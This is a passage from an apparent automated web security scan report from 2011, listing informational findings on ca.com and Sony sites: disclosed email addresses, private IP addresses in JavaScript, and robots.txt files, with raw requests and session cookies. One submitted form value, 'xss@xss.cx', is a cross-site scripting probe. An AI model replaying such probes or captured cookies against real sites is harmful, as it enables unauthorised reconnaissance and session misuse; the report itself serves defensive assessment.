Host:   https://www.ca.com
Path:   /us/register/forgotpassword.aspx

Issue detail

The following email address was disclosed in the response:

Request

POST /us/register/forgotpassword.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/forgotpassword.aspx
Content-Length: 2998
Cache-Control: max-age=0
Origin: https://www.ca.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3freturnURL=L3VzL2RlZmF1bHQuYXNweA==; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351643167:ss=1315351389192

__VIEWSTATE=%2FwEPDwULLTE5NTE0OTU5ODEPZBYCAgEQZGQWCGYPZBYOAgkPFgQeBGhyZWYFImh0dHA6Ly93d3cuY2EuY29tL3VzL3Byb2R1Y3RzLmFzcHgeCWlubmVyaHRtbAUIcHJvZHVjdHNkAgoPFgQfAAUuaHR0cDovL3d3dy5jYS5jb20vdXMvY29tbXVuaX
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:27:40 GMT
Content-Length: 29734


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta http-
...[SNIP]...
<input name="retriveEmail" type="text" id="retriveEmail" class="small formfieldwidth2" value="xss@xss.cx" />
...[SNIP]...

15.8. https://www.ca.com/us/register/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<p>CA Technologies employees, please use your email address (pmfkey@ca.com) and click <a href="../register/forgotpassword.aspx">
...[SNIP]...

15.9. http://www.kb.sony.com/selfservice/jslib/CalendarPopup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/jslib/CalendarPopup.js

Issue detail

The following email address was disclosed in the response:

Request

GET /selfservice/jslib/CalendarPopup.js HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true&region=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353074542

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"31095-1187921154000"
Last-Modified: Fri, 24 Aug 2007 02:05:54 GMT
Content-Type: text/javascript
Content-Length: 31095
Date: Tue, 06 Sep 2011 18:51:06 GMT

// ===================================================================
// Author: Matt Kruse <matt@mattkruse.com>
// WWW: http://www.mattkruse.com/
//
// NOTICE: You may use this code for any purp
...[SNIP]...

16. Private IP addresses disclosed  previous  next
There are 5 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


16.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 17 Aug 2011 19:11:58 GMT
Accept-Ranges: bytes
ntCoent-Length: 30189
Content-Type: application/x-javascript
Content-Length: 30189
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:33 GMT
Connection: close
Cache-Control: private

/*
* DEV changelog
*
* 08.04.11 - JT : Adding function trackImpression to populate omniture variable 'prop29' (page state)
* 08.12.11 - JT : Adding code to clear 'prop29' in function 'clearOmni
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

16.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 15 Jul 2011 18:28:02 GMT
Accept-Ranges: bytes
ntCoent-Length: 14211
Content-Type: application/x-javascript
Content-Length: 14211
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private

/*    SONY | SONY STYLE
*    TV LANDING PAGE Project JS Functions and Event Listeners
*    
*    Authors:
* Alex Jain, Sr Assoiciate Interactive Development | B2C CST SAPE Augmentation team aljain@sapient
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

16.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 05 Aug 2011 21:36:13 GMT
Accept-Ranges: bytes
ntCoent-Length: 12440
Content-Type: application/x-javascript
Content-Length: 12440
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private

/*******
The Tabbing class

AUTHOR: Jonathan Cheung, Sr. Flash Developer for Sony Style, Sony Electronics
DATE: Feb 16, 2010
DESCRIPTION:
This class can easily provide custom tabbing with deep linking
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

16.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 30 Jun 2011 22:25:11 GMT
Accept-Ranges: bytes
ntCoent-Length: 15544
Content-Type: application/x-javascript
Content-Length: 15544
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private

if( typeof moduleSpace == 'undefined' ){ var moduleSpace = {}; }
if( typeof utilSpace == 'undefined' ){ var utilSpace = {}; }

//avoiding use of global variables.
//using a global object to store
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

16.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 01 Sep 2011 22:46:39 GMT
Accept-Ranges: bytes
ntCoent-Length: 15093
Content-Type: application/x-javascript
Content-Length: 15093
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:33 GMT
Connection: close
Cache-Control: private

if( typeof moduleSpace == 'undefined' ){ var moduleSpace = {}; }
if( typeof utilSpace == 'undefined' ){ var utilSpace = {}; }

//avoiding use of global variables.
//using a global object to store "glo
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

17. Robots.txt file  previous  next
There are 7 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


17.1. http://blog.trendmicro.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.trendmicro.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.54
Content-Type: text/plain; charset=UTF-8
Pragma: no-cache
X-Varnish: 1696291583
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:16:29 GMT
Date: Tue, 06 Sep 2011 18:16:29 GMT
Content-Length: 614
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /trackback
Disallow: /comments
Disallow: /catego
...[SNIP]...

17.2. http://display.digitalriver.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: display.digitalriver.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 18:13:03 GMT
Server: Apache/2.2.9
Last-Modified: Wed, 27 Oct 2010 13:56:47 GMT
ETag: "18063c-1a-4939998a3e5c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

17.3. http://pastebin.com/i/fixed.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/fixed.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pastebin.com

